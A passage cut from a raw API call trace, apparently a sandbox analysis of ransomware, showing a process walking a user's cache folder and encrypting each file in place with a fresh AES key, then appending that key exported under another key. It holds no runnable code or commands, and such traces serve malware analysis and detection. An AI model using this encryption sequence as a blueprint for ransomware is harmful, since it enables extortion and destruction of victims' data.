lpNewFilePointer=0x0) returned 1 [0147.378] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.379] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.379] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.379] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.380] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.380] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x192, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x192, lpOverlapped=0x0) returned 1 [0147.380] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.380] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x192, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0147.380] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.380] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.380] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.380] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.380] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.380] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.380] CloseHandle (hObject=0x198) returned 1 [0147.400] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.405] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.405] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.405] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.405] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.405] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", dwFileAttributes=0x80) returned 1 [0147.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.406] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=398) returned 1 [0147.406] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=398) returned 1 [0147.406] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.406] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.407] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.407] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.407] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.407] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.407] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e, lpOverlapped=0x0) returned 1 [0147.407] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.407] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.407] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.407] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.408] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.408] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.408] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.408] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.408] CloseHandle (hObject=0x198) returned 1 [0147.440] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.444] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.444] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.444] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.445] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.445] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", dwFileAttributes=0x80) returned 1 [0147.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.445] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=398) returned 1 [0147.445] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=398) returned 1 [0147.445] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x6c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.446] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.446] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.446] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.446] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.446] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.447] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18e, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x18e, lpOverlapped=0x0) returned 1 [0147.447] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.447] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x18e, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x190) returned 1 [0147.447] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.447] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x190, lpOverlapped=0x0) returned 1 [0147.447] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.447] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.447] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.447] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.447] CloseHandle (hObject=0x198) returned 1 [0147.469] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.475] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.475] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.475] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.475] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.475] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", dwFileAttributes=0x80) returned 1 [0147.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.476] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=404) returned 1 [0147.476] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=404) returned 1 [0147.476] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.476] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.477] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.477] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.477] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.477] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.478] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x194, lpOverlapped=0x0) returned 1 [0147.478] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.478] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x194, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0147.478] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.478] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.478] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.478] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.478] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.478] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.478] CloseHandle (hObject=0x198) returned 1 [0147.501] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.506] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.506] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.506] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.506] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.507] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", dwFileAttributes=0x80) returned 1 [0147.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_d33192d58aa9ca2b9097e848e9fe86de"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.507] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=408) returned 1 [0147.507] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=408) returned 1 [0147.507] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.507] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.508] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.508] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.508] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.508] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.508] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x198, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x198, lpOverlapped=0x0) returned 1 [0147.508] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.508] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x198, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a0) returned 1 [0147.509] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.509] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1a0, lpOverlapped=0x0) returned 1 [0147.509] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.509] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.509] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.509] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.509] CloseHandle (hObject=0x198) returned 1 [0147.526] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.530] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.530] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.530] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.530] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.531] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", dwFileAttributes=0x80) returned 1 [0147.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d52c56d8f24bec96604372afbaf264e1_e76a2b627dd019eb51d9335f24b14c2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.532] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=420) returned 1 [0147.532] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=420) returned 1 [0147.532] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x82, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.532] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.533] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.533] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.533] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.533] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.533] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1a4, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1a4, lpOverlapped=0x0) returned 1 [0147.533] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.533] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1a4, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1b0) returned 1 [0147.533] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.533] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1b0, lpOverlapped=0x0) returned 1 [0147.533] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.533] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.533] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: 